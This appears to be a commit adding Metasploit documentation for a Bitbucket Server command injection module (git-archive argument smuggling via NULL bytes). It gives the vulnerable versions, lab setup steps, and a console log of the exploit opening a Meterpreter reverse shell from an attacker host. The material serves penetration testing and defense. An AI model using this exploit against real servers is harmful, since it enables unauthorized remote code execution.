add documentation
This commit is contained in:
space-r7
@@ -0,0 +1,118 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Various versions of Bitbucket Server and Data Center are vulnerable to
|
||||
an unauthenticated command injection vulnerability in multiple API endpoints.
|
||||
|
||||
The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
|
||||
creates an archive of the repository, leveraging the `git-archive` command to do so.
|
||||
Supplying NULL bytes to the request enables the passing of additional arguments to the
|
||||
command, ultimately enabling execution of arbitrary commands.
|
||||
|
||||
According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
|
||||
|
||||
Any version released after version `6.10.17` and before:
|
||||
* `7.6.17`
|
||||
* `7.17.10`
|
||||
* `7.21.4`
|
||||
* `8.0.3`
|
||||
* `8.1.3`
|
||||
* `8.2.2`
|
||||
* `8.3.1`
|
||||
|
||||
Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
|
||||
|
||||
### Installation Instructions
|
||||
|
||||
1. Install Git on the target machine
|
||||
* sudo apt install -y git
|
||||
2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
|
||||
[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
|
||||
3. Make sure the resulting bin file is executable and run it
|
||||
* chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
|
||||
4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
|
||||
5. Check `Install a Server instance` and click `Next`
|
||||
6. If the default destination directory looks good, click `Next`
|
||||
7. Click `Next` if the default Bitbucket data directory looks fine
|
||||
8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
|
||||
9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
|
||||
10. Click `Install` if everything looks correct on the summary screen
|
||||
11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
|
||||
and click `Next`
|
||||
12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
|
||||
13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
|
||||
14. If you already have an account, select `I have an account`; otherwise, create a new account
|
||||
15. 'up and running' should be selected on the next page, so click `Generate License`
|
||||
16. Confirm that the prompt gives you the correct server, then click `Yes`
|
||||
17. The license should be entered in the box, so select `Next`
|
||||
18. Finally, set up an administrator account
|
||||
|
||||
*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
|
||||
page at 127.0.0.1:7990
|
||||
|
||||
### Vulnerable Setup
|
||||
|
||||
1. Log into Bitbucket with your administrator credentials
|
||||
2. Once logged in, select `Projects` at the top menu
|
||||
3. Select `Create project`
|
||||
4. Enter a name for the project and click `Create project`
|
||||
5. On the next page, select `Create repository`
|
||||
6. Enter a name for the repository and select `Create repository`
|
||||
7. Follow the instructions to clone the repository and push data to the repository so it is not empty
|
||||
8. Click the gear on the left side of the next page
|
||||
9. Select `Repository permissions` under `Security` on the left
|
||||
10. Underneath `Public access`, check `Enable` to make the repository public
|
||||
|
||||
Bitbucket should now be exploitable
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
|
||||
4. Do: `run`
|
||||
5. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
|
||||
An optional username to authenticate to Bitbucket with
|
||||
|
||||
### PASSWORD
|
||||
|
||||
An optional password to authenticate to Bitbucket with
|
||||
|
||||
### Bitbucket version 8.2.1 on Ubuntu 22.04
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
|
||||
rhost => 192.168.140.216
|
||||
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
|
||||
lhost => 192.168.140.1
|
||||
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.140.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Searching Bitbucket for publicly accessible repository
|
||||
[+] Found public repo 'repo_name' in project 'TEST'!
|
||||
[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
|
||||
[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
|
||||
[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
|
||||
[*] Sending stage (3020772 bytes) to 192.168.140.216
|
||||
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
|
||||
[*] Command Stager progress - 100.00% done (118/118 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: atlbitbucket
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.140.216
|
||||
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
Reference in New Issue
Block a user